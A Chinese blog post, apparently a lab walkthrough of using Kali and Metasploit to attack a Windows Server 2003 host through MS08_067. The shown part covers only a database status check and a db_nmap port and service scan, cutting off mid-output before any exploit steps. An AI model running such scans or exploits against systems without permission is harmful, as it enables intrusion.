kali利用MS08_067简单渗透的过程

本文介绍了如何使用kali Linux针对一台运行Windows Server 2003的设备进行渗透测试。首先通过db_nmap进行端口扫描,发现开放了多个端口,包括FTP、HTTP、RPC等。接着搜索并利用MS08_067漏洞,成功触发漏洞并获取了目标系统的命令行shell。
摘要由CSDN通过智能技术生成

被攻击者IP192.168.128.149                        操作系统:Windows Server 2003

第一步,检测数据库的连接状态:

msf > db_status

[*] postgresql connected to msf

第二步:开始扫描运行的服务:

msf > db_nmap -sS -sV -O -n 192.168.128.149

[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-06 16:54 CST

[*] Nmap: Nmap scan report for 192.168.128.149

[*] Nmap: Host is up (0.00025s latency).

[*] Nmap: Not shown: 986 closed ports

[*] Nmap: PORT     STATE SERVICE         VERSION

[*] Nmap: 21/tcp   open  ftp             Microsoft ftpd

[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 6.0

[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC

[*] Nmap: 139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn

[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows 2003 or 2008 microsoft-ds

[*] Nmap: 777/tcp  open  multiling-http?

[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 1026/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 1027/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 1031/tcp open  msrpc           Microsoft Windows RPC

[*] Nmap: 6002/tcp o

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值